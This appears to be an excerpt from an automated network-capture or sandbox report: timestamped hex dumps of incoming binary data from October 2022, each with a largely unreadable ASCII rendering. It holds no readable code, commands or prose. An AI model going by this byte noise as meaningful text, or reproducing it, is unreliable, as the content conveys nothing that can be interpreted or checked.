                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12617INData Raw: bd b3 ff 14 a5 be 7b 05 49 c0 4e d1 58 56 b0 c1 a9 40 ab a2 62 ab aa 08 f7 a2 0c 19 a4 dc 8a c3 b2 a5 77 0c 53 93 b6 59 80 95 87 1a 26 3e 53 0c 15 64 9d 40 13 67 96 be b3 61 1a 63 bd 7b 1b 6f 06 4d d1 6e 88 76 c2 a9 7e 85 64 61 ab 84 16 31 a1 0c 17 9f f9 f7 5f 38 1a 08 95 01 88 06 ed d0 01 00 00 38 83 92 23 60 e7 b5 c5 21 c0 9b ae 20 28 60 47 58 77 df 3f a7 52 09 db 5f a6 f7 07 dd bf cb 38 ed 25 00 b8 8d d6 d8 df 18 82 6e 23 20 35 7c 2d 24 e0 7e 22 90 29 a0 2c 63 58 de 9f 5b 0b 96 dd 3f c7 f8 73 d4 9f cd fe 24 23 c0 d7 0c 5a 27 a0 ea 81 54 21 40 09 de be d9 ff 40 73 85 24 20 d4 fb 20 14 64 4d a9 b5 0b 4c d3 0e 20 13 c5 30 20 ac d5 21 ec 5f 12 13 fa c3 1d b1 00 c5 b1 ef 92 f3 87 b4 1a 91 3b a5 09 7f 61 91 38 a6 0f ee e9 b0 3b 1d 4d eb 3a a8 48 8d 4c 59 34
                                                                                                                                                                                                                                    Data Ascii: {INXV@bwSY&>Sd@gac{oMnv~da1_88#`! (`GXw?R_8%n# 5|-$~"),cX[?s$#Z'T!@@s$ dML 0 !_;a8;M:HLY4
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12621INData Raw: 26 67 c0 76 19 f9 74 f0 63 9a 43 9f da 77 64 a8 64 96 a2 85 f5 aa 61 bc 69 77 2b c0 f9 2f 26 2e b6 e8 bb dd 38 db d1 7a 86 00 d9 5a f1 5a fa 26 f6 48 2b 0a 1f c1 18 9f b4 11 eb a1 cc 84 29 30 84 c6 ff 18 21 07 bb e2 63 91 21 7b 59 70 d8 0d d9 13 d3 2f 00 ec af 64 fc 64 6c eb 5e f3 c4 de 3a 3b 20 9f fb 26 7b b7 b6 77 cd b4 6b f2 7c cf 3e 9f 9b f8 8a 58 2f 2e 2c 20 0c 43 49 8d 47 fe 26 df f0 ba 77 0a 30 98 32 3d 4a bc 9c 9b 7d 1b e3 09 bb 3e ce 06 44 9c 82 fc e9 26 ba 16 34 08 f9 d2 e2 43 2e 07 3e eb 09 d9 93 54 e4 89 26 c3 1d ed 07 79 15 b4 97 ab c9 e3 94 fe 26 29 11 98 46 60 56 f3 0c d9 da 9d 0a 3b 3d ab 92 77 92 0b a7 fe 3c 17 0e e7 f9 46 63 f8 72 d3 2e 5b 8c 24 34 f8 26 46 3f da ff ec af 64 fa 26 68 cf 71 35 f1 d7 7a 37 75 75 0c d9 7b 1d 48 88 2f 13 05
                                                                                                                                                                                                                                    Data Ascii: &gvtcCwddaiw+/&.8zZZ&H+)0!c!{Yp/ddl^:; &{wk|>X/., CIG&w02=J}>D&4C.>T&y&)F`V;=w<Fcr.[$4&F?d&hq5z7uu{H/
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12625INData Raw: 05 20 c0 d8 fb 2b 29 c0 c6 19 55 2d a0 ff 94 5b 2b 40 a8 5b b1 d3 ff 87 9e 8a 2e 20 39 b9 32 d5 df ae c7 71 d2 1f dd b9 cc df 5f 2f 58 04 28 60 60 30 ca 2b c0 be ab 2f 22 60 70 75 78 d5 3f 42 9f 06 d1 5f 9b fa 08 d7 bf d8 2d e2 2f 00 b9 88 d9 d2 df b7 0f 61 29 20 94 c1 22 2e e0 d7 91 07 21 c5 5e db 19 47 03 5d 8f 8e 9d 61 48 19 88 3d 85 2a c6 89 7d b2 ce 43 71 b2 76 97 9e 8c cd a5 4b e8 8a fd e2 9f 87 75 c2 39 32 88 89 2d 3b ad 59 7c b2 00 db 93 7d a2 e6 94 7a 72 82 a9 37 87 88 9d db 32 11 8e 3d f7 58 ce 8f 7d a8 54 4b 77 b2 e4 05 96 8a cd bf 51 e0 8c fd f0 8d 8f 73 c2 f3 d4 73 8c 0d bf 26 2d bf be fe fb 9b 9e c8 c2 ff 0a 32 3a 64 32 2b 0c db b9 17 4d c9 b3 e8 4c 56 3b 45 21 d7 c0 44 41 9b 14 0d a0 79 ba 12 e7 f2 3e e0 c0 0d 69 04 3e 00 00 00 00 fd 9b ac
                                                                                                                                                                                                                                    Data Ascii: +)U-[+@[. 92q_/X(``0+/"`pux?B_-/a) ".!^G]aH=*}CqvKu92-;Y|}zr72=X}TKwQss&-2:d2+MLV;E!DAy>i>
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12630INData Raw: d9 f5 bd 24 a8 5a c2 a9 ff 26 4a 69 e3 04 f9 78 d7 e9 00 79 f1 bc b4 0c d9 47 cf c3 57 e9 68 44 fa 26 57 62 f6 df 2d c9 8d 0c d9 f7 2d 20 61 23 a5 ce ea 26 88 f9 64 9f 43 c6 11 78 64 f1 ba 92 3a 50 a2 14 e8 3c 5f eb c0 84 2e dc 3d 19 d9 55 b1 89 e2 26 2f 3f ae 55 84 a4 7c 5f e8 fc 67 e5 84 1d d9 9b 9b 3e 80 eb 12 ff e5 7c 4c 51 8e 9b 7b e0 94 8d de da 19 5c 03 13 5f 6b 6b d9 b3 aa cd e2 06 77 f8 93 86 3d ba 60 e9 26 a5 94 0b 0d 59 e1 e2 ce 84 23 be be 15 d9 51 5b c7 e6 86 22 fc 57 3a e2 46 45 c8 ff 13 50 9b 33 49 c2 45 84 8b 2c 25 7b db f1 e6 f9 26 30 d8 df 7f b5 8d c6 06 84 c4 d1 95 9b f3 60 5f 03 50 fc 59 46 03 de 02 60 7a d9 26 45 f3 f7 86 0f e0 a3 e1 8e 42 e8 0d d9 c3 48 1b 5f 78 7d 2c fc 26 8d 36 e6 05 f6 01 a2 1d 06 79 4d 5c 7c db 10 a3 2b 80 78 f6
                                                                                                                                                                                                                                    Data Ascii: $Z&JixyGWhD&Wb-- a#&dCxd:P<_.=U&/?U|_g>|LQ{\_kkw=`&Y#Q["W:FEP3IE,%{&0`_PYF`z&EBH_x},&6yM\|+x
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12634INData Raw: 9f e2 46 69 cf 9c 03 bf 97 83 97 bc 0d 70 b5 f5 f8 ff 61 2e 9d 28 5e 95 88 44 fe 86 53 3c 16 1f fa 72 c8 34 b0 50 1b ac 8e ad b1 3e a5 b2 ed 99 33 ff 54 28 74 01 03 48 32 9e d8 1c e9 db db 17 9d 33 dd 1d 41 ca d1 d1 34 45 58 f3 56 fd 04 ff 02 00 ca e2 d2 66 8a 77 f0 73 16 42 c2 17 00 51 cc 46 1f de 00 54 28 74 01 73 33 28 3a 10 85 e4 00 e9 93 91 16 fc 00 63 31 b0 4a cd e1 b1 c6 7e d2 70 2c 5b 80 70 46 d8 a3 bb 51 42 88 70 d8 36 f3 69 eb 30 43 fc e9 eb df 05 54 e2 ef db ab 16 e9 f1 84 20 ba 70 1d 53 95 68 af c8 35 70 e7 ea b7 7b 3b e8 1f 1f d1 49 c4 02 8b 38 e8 11 9b 66 e7 33 7b e7 c9 3d 54 1f 64 ad bd 9e f8 f7 29 76 7e 39 a6 06 87 60 83 77 70 16 33 c9 36 cd 3f 6c b5 4d ba 5f 25 40 43 28 7a 99 54 cb 06 21 8f f4 5b bd 27 d6 47 14 33 a8 65 db 2d 35 71 00 61
                                                                                                                                                                                                                                    Data Ascii: Fipa.(^DS<r4P>3T(tH23A4EXVfwsBQFT(ts3(:c1J~p,[pFQBp6i0CT pSh5p{;I8f3{=Td)v~9`wp36?lM_%@C(zT!['G3e-5qa
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12638INData Raw: 4d e8 b4 56 73 7e d1 8d bd 55 53 5f 9f bf dc c4 1e 64 f8 b7 64 40 da f7 31 d1 b7 d5 38 90 4f 06 e3 1b 14 ea de c0 a3 c0 4f d8 81 a0 8f c1 57 82 5c b6 c7 8e 87 ee 94 06 e8 cc e6 ca 76 d1 3d 25 ec 5b 5f 07 e7 65 cc 1e 3c b8 0e 6c 40 9a 9f 88 d9 b7 bd 20 29 47 06 fb 73 ad e2 de a8 05 91 0d 9a 19 d5 ee ff 17 d4 1e 2b 40 24 59 7c bd 29 f6 37 d6 a3 a4 27 23 ab 5e a4 53 62 2c c1 e3 d2 f2 7f c3 e3 9d ad b8 04 6b c2 bd 4c 17 ed cd 25 fa d4 c6 6b 99 af 09 11 c9 39 b5 0e 0d 56 94 fe d0 bf 45 a1 9c 46 d6 6e f7 36 58 5b 66 ab 4b a5 5b da 62 cc 3a 1c 32 2a 9f 38 1c c4 f2 e0 b0 4c 74 f3 6c 40 55 2a 02 a2 f8 23 a4 51 23 f8 8f e2 b0 f1 0c e1 f8 a1 43 64 94 a9 12 94 e9 fd a1 c0 cb a9 f2 f0 cc f7 27 62 40 55 28 74 01 e1 f6 63 21 3a 80 16 a4 dc 8f bb 82 af c8 99 1b 63 cf bd
                                                                                                                                                                                                                                    Data Ascii: MVs~US_dd@18OOW\v=%[_e<l@ )Gs+@$Y|)7'#^Sb,kL%k9VEFn6X[fK[b:2*8Ltl@U*#Q#Cd'b@U(tc!:c
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12649INData Raw: 7b c0 1f b5 08 d9 c1 a4 0f ef 26 6f 04 ba 0a f9 25 95 c3 14 d9 73 0b 85 86 22 b9 c7 fc 26 d6 e1 55 1e df 13 e9 fb 26 92 49 ed a0 59 cb 34 09 d9 06 ae ea bd bc c7 bc 97 9b f0 0f 03 dd fd 6d c2 4a 03 72 82 5b 00 4b 3b 71 8b f4 9e cf 10 7a 6b 7b 29 99 84 0d 95 34 4e 3c b2 2e cf bd d3 8a 05 81 af 01 1f 6c f6 52 d8 c6 6c f3 b9 8e 27 08 f2 bc cf 41 c1 2b 5f 10 b9 d7 7c 4a 2a 23 e9 18 40 53 1d f5 07 a4 a2 1b 2c 41 b4 9e 87 67 c4 b1 b6 38 dc 3f 42 89 d0 f7 71 50 2b 75 9e 06 ad 42 1c 9e 03 46 44 cd fa 02 43 55 bb 33 db a0 2a 83 25 8c b5 98 21 5a 63 b4 e0 50 4a 2c e6 75 40 a3 54 64 ee 15 63 f3 ff 42 3e 4b 3c 44 3b 95 cd ac 3d c0 bb 41 6a f1 ec c4 ff ac ea 4b 86 5c bf 5d 71 74 7f 4c 77 6c 81 7c 84 1d 21 e4 8c 2e d0 2e 94 03 56 28 fb 86 a0 54 0a 10 d3 60 f3 21 2c f8
                                                                                                                                                                                                                                    Data Ascii: {&o%s"&U&IY4mJr[K;qzk{)4N<.lRl'A+_|J*#@S,Ag8?BqP+uBFDCU3*%!ZcPJ,u@TdcB>K<D;=AjK\]qtLwl|!..V(T`!,
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12654INData Raw: 7b 1b 1e 10 cd 29 ed 67 9e 93 9a f8 29 9e d0 ff 13 50 9a 13 7f b3 c5 d7 03 13 2f 85 c9 de d0 f0 26 2e 49 3c 8b d3 aa ef 29 03 0a f3 b8 7b 18 bc e9 2a 00 13 50 9a 1b f9 1c be 27 e2 9f df 3a 87 01 96 0a d9 de d0 c3 74 5b 92 54 7e f3 91 1d f3 e7 26 92 1f c5 ba c1 4c c5 ff eb af 64 f8 44 84 27 62 f6 df e5 de ff 0f 86 06 a5 e0 0c e0 dd 67 71 a2 3d 1c d9 7d f0 cf 62 62 67 0a 1e d9 66 d8 d2 16 d9 f2 6e de e3 26 52 92 c4 8a ca b3 cb ff ec af 64 fa b3 7c 3f e8 cb 1c 31 c5 14 2c d5 12 d9 4e de 30 00 ec af 64 ec 03 c1 c5 d4 0a a8 34 65 9a a4 ab ec 26 96 81 ce 1b 12 43 7e 64 2d f9 17 7a 10 80 31 ca 01 1f 38 00 ec af 64 fa 62 10 2d d0 65 3b 3b a5 9e 44 70 e7 26 25 7b c5 ff ec af 64 e8 7d 9c 39 33 91 0f ce cf eb ba b1 ca ff ec af 65 f4 c6 0c bf 3b 2d 3d 25 3b c6 49 01
                                                                                                                                                                                                                                    Data Ascii: {)g)P/&.I<){*P':t[T~&LdD'bgq=}bbgfn&Rd|?1,N0d4e&C~d-z18db-e;;Dp&%{d}93e;-=%;I
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12670INData Raw: 17 ea 66 c9 90 04 12 99 e9 43 37 15 99 21 c8 f7 11 99 21 ff 28 e0 66 7e d1 25 ef 66 69 67 5d ef 66 4d 74 93 01 99 e5 4e 11 0b 99 1e ec ed f7 66 ad 68 80 0c 99 69 d7 58 04 99 35 ec 4b fc 66 fd 28 8b ff 66 4b 80 dd bf ed af 64 f8 2a 8f 30 42 43 60 15 04 99 82 7a 22 f3 76 c0 df fc 66 17 09 2e 09 5e d6 e2 c4 0a 99 a2 ab 6a a2 5b 89 74 dd f9 66 9b d2 b2 fc b6 dd 00 d5 0b 99 1f 11 05 96 a0 fd 1b 51 ee 66 cf d1 e0 e6 5b 9b 75 32 40 15 50 1b 00 0b 85 40 4d 17 e6 31 3b 46 1f d0 13 99 b1 49 88 3e ec 1d ff 99 98 cb ab 25 cf 43 33 1b 99 94 ed 5c 69 47 db c1 35 40 ea af e4 fb 43 31 1f c4 fb 58 37 bb 13 7d 81 07 99 ca dd 83 3e 5f 68 c8 06 99 3e 40 18 32 b5 09 63 70 f7 66 4f 41 41 21 46 91 08 44 b7 52 71 2d 22 40 ed af 64 f8 11 1a b7 c4 d7 3b 22 c5 e7 d4 f9 05 99 c9 e4
                                                                                                                                                                                                                                    Data Ascii: fC7!!(f~%fig]fMtNfhiX5Kf(fKd*0BC`z"vf.^j[tfQf[u2@P@M1;FI>%C3\iG5@C1X7}>_h>@2cpfOAA!FDRq-"@d;"
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12681INData Raw: de 8d e3 cf d7 17 f9 c8 04 1d e8 a4 55 a8 50 fe 0f 95 f2 bf 5b 87 6e 1d 4f 59 95 9f 9f 61 f5 f5 d9 96 9d b9 b2 ba 59 f2 0f 06 7a 13 f5 9a 58 d4 2b 9a 15 b7 87 ca 42 21 f5 1b a4 2d e8 21 50 6f e7 17 84 25 c3 aa 01 9f 89 26 46 97 03 77 c1 37 ff ff ff 7f ce b0 35 00 38 fd 8b 30 8b 0d 64 8c 6b 03 f7 1f f5 5f 19 2d d6 77 71 b5 3d 10 7e 8d f9 63 7b b1 e2 4f 9f d8 71 76 03 e8 5a 23 00 20 ae 02 f2 b6 de e6 d3 32 00 95 2a ef 3e 00 03 39 dc 24 e2 99 cf 06 d5 90 b6 1b 6f 17 cd cc ff d5 66 4f c9 9e b2 c7 d4 3a 27 72 93 42 10 0f ef c8 ff 00 00 00 00 18 ae 84 7d c2 10 81 db 46 d0 0c 8f fe ee d8 2b 46 3e d5 77 3f 00 84 58 0f 6a 7f 5b b6 5d 3b b2 09 c9 ff 00 00 00 20 a0 7c a7 e5 db 4c 54 29 91 04 74 d8 c6 65 76 c5 ff ff ff ff df b1 b3 39 00 b6 dc f2 37 00 9a 03 09 c4 ff
                                                                                                                                                                                                                                    Data Ascii: UP[nOYaYzX+B!-!Po%&Fw7580dk_-wq=~c{OqvZ# 2*>9$ofO:'rB}F+F>w?Xj[]; |LT)tev97
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12697INData Raw: ff 09 b7 05 d7 1b f0 99 dc 91 0b 7c 25 97 14 0e 24 8a 2c ef fd 33 5a 07 a1 ef 81 9f 6e d6 12 a8 f6 6e d3 f9 86 ff 0a d2 fc e7 09 c3 0b 1f b8 11 d5 5c 0a fa a3 eb 38 00 ab d5 f7 27 e4 62 2b 2e 61 f4 5e c7 45 18 f1 11 d9 b2 38 2e 77 9e f1 66 6e c5 1c fb 66 c5 17 e0 07 99 36 b3 8d fc 66 da a4 55 f4 66 9e a7 46 0c 99 3e 94 75 0b 99 ee e7 b5 0f 99 5f 60 6a fe 66 11 9e 67 f1 66 ae a0 1f f1 66 32 6b d1 1f 99 7a d1 53 15 99 89 7b af e9 66 52 d7 c2 12 99 5e e0 1a 1a 99 a2 bb 09 e2 66 53 18 3a e5 66 12 c0 5b e1 66 a1 50 43 40 4a 33 ec a7 79 76 b7 72 9d a9 27 d8 26 97 39 f7 3b 02 f0 f9 dc 75 10 d2 0c b5 02 ed b3 dd b5 07 06 65 ec d1 06 03 54 fa 18 df e0 03 9a 0e 88 f5 91 88 30 ec ff b0 8e 2c f3 1b 31 88 f5 b5 0b 15 1c be 30 0e cd 83 05 cb fd 2a 63 2e 85 ef 80 ce 47
                                                                                                                                                                                                                                    Data Ascii: |%$,3Znn\8'b+.a^E8.wfnf6fUfF>u_`jfgff2kzS{fR^fS:f[fPC@J3yvr'&9;ueT0,10*c.G
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12713INData Raw: d5 c6 8b 90 5b 08 11 c1 b0 41 0f 0d df fd 0a d1 bf ad a8 68 47 d6 e6 96 c2 59 5b a6 b2 bf a4 5b 02 13 38 3b 1c 43 5b 6b 39 1c d5 96 f7 b2 0c 9e 4e d2 ff 46 28 ec 13 45 df 93 08 67 3e 89 af 48 3c ba da b3 eb 75 75 74 1d a6 ae f2 77 49 b3 30 2f da bf 43 28 7c 77 56 ba 7f a0 74 4e 86 7f d1 95 6d a0 52 5f 4f 47 29 c5 1e 9c 40 42 65 40 62 47 c4 d0 b7 65 90 65 4e 06 4b 93 e1 eb de 48 3b 35 4e d8 19 c8 7a c0 57 ea dc 43 c6 8e 07 4e 61 07 e8 6c 7e 3f 77 d1 a5 35 19 5a 5f 17 ef 90 cd 1e 34 00 fb 6d 40 22 bf 7d d8 b7 9d a0 dc 46 06 7b 93 58 e3 de 48 c5 64 0c 9a e6 18 97 1b 23 c6 af f2 66 9f 01 77 fa 66 73 4a 64 02 99 2b 61 57 05 99 4b 22 97 01 99 62 7d 48 f0 66 ec 63 45 ff 66 fb f5 3d ff 66 77 0e f3 11 99 3f 94 71 1b 99 fc ee 8d e7 66 97 72 e0 1c 99 4b d5 38 14 99
                                                                                                                                                                                                                                    Data Ascii: [AhGY[[8;C[k9NF(Eg>H<uutwI0/C(|wVtNmR_OG)@Be@bGeeNKH;5NzWCNal~?w5Z_4m@"}F{XHd#fwfsJd+aWK"b}HfcEf=fw?qfrK8
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12729INData Raw: 9a c6 37 f9 50 9a 7e 41 d9 0a 9e 4e 85 79 3e cb bf 6b f1 da e3 03 b7 b9 c7 84 88 46 36 40 01 00 00 40 d8 30 3b e7 4b 08 f4 1d 10 f5 f2 65 c4 06 c4 c7 95 be ac 09 2b 50 b4 8b b6 03 f9 7d 98 6e 43 3f af 23 40 e9 7e e8 e8 65 03 56 d4 bf 01 00 00 e0 4b 5d d8 bf 8d 39 85 23 40 93 ec 2d c0 bf c5 2f 07 d4 bf 09 00 fc 27 40 f0 15 7c db bf 68 a0 45 d8 bf d3 21 73 d4 bf 07 7a 96 2f 40 42 63 e7 df bf 43 8c b6 2d 40 65 44 67 23 40 31 fd 40 2b 40 57 60 e8 c8 bf a9 3b c2 dc bf 9d dc 39 2f 40 ac e1 b9 d3 bf 9c d4 80 d0 bf 27 dd b6 dc bf fb 26 1c 41 40 0f 85 68 b3 fb ff 66 83 78 fe 69 e9 76 55 fe ff 7f 14 96 97 f2 7b 67 79 4e 1f f7 64 7b 65 59 bc 09 e6 c7 71 4b 9f f4 c7 21 2d 84 0d 70 1f 9a a0 09 30 a6 a7 e5 f5 17 93 f1 ad f0 3f f4 eb d8 04 b8 1b da 49 05 80 24 fb 8f fa
                                                                                                                                                                                                                                    Data Ascii: 7P~ANy>kF6@@0;Ke+P}nC?#@~eVK]9#@-/'@|hE!sz/@BcC-@eDg#@1@+@W`;9/@'&A@hfxivU{gyNd{eYqK!-p0?I$
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12745INData Raw: 03 c4 48 52 5e fb 3b 1d f3 d9 fb 3b 4e 5c b9 f1 3b e6 c0 55 0b c4 98 02 73 f7 3b 05 7b 5b 0b c4 bb 29 8c 0d c4 92 e8 b5 0c c4 e6 68 8b 0e c4 dc 9e aa f2 3b 18 2a f5 f1 3b 84 8e fe 09 c4 21 9f 79 09 c4 c2 20 19 03 c4 fa 7e 31 d8 bf c3 f3 db 77 21 9e ec db 57 d3 40 e9 23 28 91 c6 a9 d9 47 a6 0f d9 d3 df 62 c0 0b c1 87 aa e6 10 38 30 d4 79 34 3c 70 45 34 71 c0 57 00 9a 39 c5 7f 9f a8 4c 31 f8 58 91 dd 30 c0 6f 90 1b cf 57 dd 0e 1e 37 28 df 08 5e cd 47 68 71 2e c7 df 1c 46 fc d5 87 2c b0 e7 2c 30 82 d7 c3 28 70 eb 7a 86 d4 57 4e db 5d 87 8e d6 55 ce 8c 40 fe e4 d3 bf fe ff ff ff 76 0d b1 bf 95 25 f8 9b ac 71 34 21 fc 17 96 03 c2 a7 05 2f 3c ed 64 9b d9 01 5b bb 71 ca 04 3c a0 02 de db dc a2 9d 89 0e 60 97 b7 fc 89 55 b2 ea 5c 8f 48 43 4e bc 12 dc d2 5b e8 b9
                                                                                                                                                                                                                                    Data Ascii: HR^;;N\;Us;{[)h;*;!y ~1w!W@#(Gb80y4<pE4qW9L1X0oW7(^Ghq.F,,0(pzWN]U@v%q4!/<d[q<`U\HCN[
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12761INData Raw: 7b 09 8f ee 61 d7 e0 0d 15 42 18 54 fc f0 b8 80 63 15 7e a4 e6 c9 86 56 d7 15 48 d5 7b 80 f1 c8 c2 59 05 26 b0 a1 ed 37 8f 03 fd 36 19 f6 bb 10 b3 54 ba d4 0b 7e 84 c6 4a 3c 4a d2 11 66 ec 78 30 58 c2 05 78 b0 20 7d b9 16 86 c0 8e 23 12 ed 95 b8 91 ad 68 6f 37 44 aa 20 3e 3e 00 14 85 0c 41 42 71 81 d2 a8 e5 b6 af eb 98 e4 5c 77 2b b6 f3 06 61 15 51 78 74 1c 2b 90 04 c4 eb 71 70 9b b8 88 44 7d af 2d 3d 99 8e c9 5d 75 e0 1c 42 b9 72 e0 c2 4c c2 20 60 6a 3c e3 fc c6 83 e7 0f a2 57 08 41 de 26 ff 25 cd fc 5a 8c ea 2c 74 35 02 4f 2e d5 d6 36 5d bf 0a 07 f2 a8 04 33 74 8b b7 98 f8 cc a2 ba 61 03 2b 2b c5 d2 84 fa 00 e0 e2 67 7e 71 2c d4 0f 32 ba 94 dd 3a 0e a3 df 0e 62 22 f0 b5 db 2e 6c 09 97 64 82 4c 64 8c e2 ae 83 95 e2 e3 1d 22 38 0d 63 b4 e9 65 45 5a c9 bb
                                                                                                                                                                                                                                    Data Ascii: {aBTc~VH{Y&76T~J<Jfx0Xx }#ho7D >>ABq\w+aQxt+qpD}-=]uBrL `j<WA&%Z,t5O.6]3ta++g~q,2:b".ldLd"8ceEZ
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12777INData Raw: 2a 39 f0 8b b3 13 ee 2d 77 06 ad 66 d2 7e 6a a4 ae ca 22 ef cc 3b 72 54 cd 51 72 ea c1 03 16 4e 0e 6b 51 be 3a 7c 7f 6d 6b ab 67 d6 3d cc 11 ae 8d a0 54 cf c0 69 75 4e b2 3f c1 63 fc 14 24 da 0e f1 62 71 67 ec d5 b6 70 c8 03 b0 c6 88 d7 a4 46 37 ef 58 82 c7 93 cd 78 d1 02 79 b4 24 9a 25 1d 32 01 0e 88 1c 7f 08 3a 8a 05 44 5d 4a 54 a2 1d 39 5d 84 9a 25 d2 01 9d 62 8e 08 97 ed 91 fe d8 da c7 4f 84 f9 52 cc 48 37 36 6d 0f 64 32 b0 56 35 1b fc 7f 0d ff df b8 b5 c7 1c 0b 91 a1 2c ef 90 f0 b4 98 e0 4d 77 34 e5 ed 9a ce fb 0e 9d 6b 48 a6 c7 f4 1f 5a 15 a9 6f c5 f7 70 e6 13 e5 f9 7e 0d ba 23 f2 eb b7 f8 a9 12 29 4a 77 3c c8 a9 a0 05 f8 c5 98 6a 82 f4 dd e6 93 f1 7b 3d 3e ea 36 27 d0 13 d5 18 95 65 d9 bb 9e d1 e4 ad 33 de 4e cc 76 58 a5 b2 ce be 9d 8b 36 65 41 9c
                                                                                                                                                                                                                                    Data Ascii: *9-wf~j";rTQrNkQ:|mkg=TiuN?c$bqgpF7Xxy$%2:D]JT9]%bORH76md2V5,Mw4kHZop~#)Jw<j{=>6'e3NvX6eA
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12793INData Raw: d2 9f b9 0c 74 1d f0 0f 00 8c 57 f7 9a 86 3a 6f 98 15 f9 89 8e 40 21 c2 9c db 1a 8d 5f 9e 32 c8 ff ff ff ff 06 f8 3b 00 fb 09 a1 3c 00 2f 12 55 87 a3 f4 00 d6 ff 5e 84 fa 56 e4 61 d0 20 00 7f 3f 32 75 d5 78 35 66 2a 84 cb ce ff 00 00 00 c0 5e 37 d7 ff 1c f1 d7 cc 76 35 27 f3 2a 11 13 b5 f9 e0 6a 3f 00 6e 0c 7c 77 b3 74 82 07 d5 ad ab cf ff b6 8e b2 dc 88 f1 48 dd 14 37 49 36 00 00 00 00 60 22 b3 12 91 4c 7f 25 c7 b3 d5 b8 b3 9a 36 0e d8 cd a4 1c 4f 1a 70 1a 9a 49 c0 6f f6 46 04 03 91 fe e8 61 45 9d 56 62 32 6c dd ff cf e5 f1 9a 29 fb 65 d1 97 fe ff ff bf 2f 6a 37 40 9e 6f 46 22 40 1f 32 c6 de bf 8f 27 ff dd bf d4 ae c9 d1 bf a8 65 2c 2a 40 1d 5c 5d da bf 5c c3 0c 28 40 ea 2b dd 26 40 5e f2 fa 2e 40 b8 97 52 cd bf 3e 14 78 d9 bf 52 43 83 2a 40 13 26 03 d6
                                                                                                                                                                                                                                    Data Ascii: tW:o@!_2;</U^Va ?2ux5f*^7v5'*j?n|wtH7I6`"L%6OpIoFaEVb2l)e/j7@oF"@2'e,*@\]\(@+&@^.@R>xRC*@&
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12809INData Raw: 15 c8 58 87 7f 21 23 a4 c4 39 66 1c 5e ed bf f9 b3 bf ef fb aa 1f e5 4c 13 61 e7 bf 01 00 00 60 c3 43 08 29 58 9a f5 bf 64 95 b7 3e 72 52 d3 31 95 50 92 ee bf 01 00 00 e0 cb 74 12 cc 65 bb f6 bf 8b a7 84 19 4f 24 3f 7b 7b d6 80 ef bf 01 00 00 60 1c c5 ce e5 50 e1 ee bf 0b 3b 39 54 f0 67 9c 0e 37 70 85 0a 6b ea 06 b4 12 a3 be 80 2a eb 0c 64 82 f5 19 40 35 05 d2 37 6d 4d 71 02 79 02 73 1f 40 fe ff ff bf fa 83 03 d0 90 63 86 7c ad a5 63 0e 7b 75 63 00 40 fe ff ff 1f 9d e8 43 cb d7 82 1a 40 71 36 2c 5a d9 d2 74 d9 ad e4 88 04 40 fe ff ff 1f de 04 5d 71 55 3f 0d 05 40 fe 5e 56 66 dd d5 50 e8 09 f9 c7 6a 44 a5 98 e1 5e 82 13 79 d5 cb 29 b1 f3 a4 62 15 e9 56 0a d2 06 80 8b a1 be 4b 77 2d f3 5b 14 0c 0a 40 7d e5 7e 17 6d 7e b3 70 4d 21 f1 00 40 01 00 00 00 97 19
                                                                                                                                                                                                                                    Data Ascii: X!#9f^La`C)Xd>rR1PteO$?{{`P;9Tg7pk*d@57mMqys@c|c{uc@C@q6,Zt@]qU?@^VfPjD^y)bVKw-[@}~m~pM!@
                                                                                                                                                                                                                                    2022-10-04 05:10:12 UTC12825INData Raw: dd fc b7 00 f9 66 3f ed fc 05 99 54 b1 91 fe 66 90 6e 49 f6 66 34 0d 5a 0e 99 6c 26 69 09 99 94 9d a9 0d 99 e5 da 76 fc 66 93 3c 7b f3 66 04 0a 03 f3 66 20 19 cd 1d 99 28 83 4f 17 99 83 51 b3 eb 66 58 9d de 10 99 75 0a 06 18 99 18 21 15 e0 66 b8 12 26 e7 66 40 49 e6 e3 66 09 b0 d8 10 99 d2 d3 b2 bf 4a af e7 fd a3 fa 46 93 b4 1e 13 ee 26 ff 7c bb 48 7b 6a e3 11 d9 35 3c ac 9d 1a 1f a3 c6 eb 26 8c 42 97 92 07 d9 14 2e ee 26 fb b2 41 04 ef 72 70 73 1d d9 af e6 3d 03 11 c1 b2 10 e6 26 50 79 72 e1 b3 82 c2 ff ec af 61 a4 73 7f 56 30 3f 2b 35 a5 97 6b ec e6 26 6a 69 6a 81 af 9a 4b e9 26 f8 25 ed 60 9d 1b db ff ec af 61 a0 55 9e 97 40 66 f8 29 c5 19 29 00 00 d9 e8 5b 8f 7e 35 c7 53 06 d9 a5 07 bc 75 18 7a de ff ec af 61 98 bc 67 c3 49 19 99 d8 ba 2a 27 3f f3 26
                                                                                                                                                                                                                                    Data Ascii: f?TfnIf4Zl&ivf<{ff (OQfXu!f&f@IfJF&|H{j5<&B.&Arps=&PyrasV0?+5k&jijK&%`aU@f))[~5SuzagI*'?&
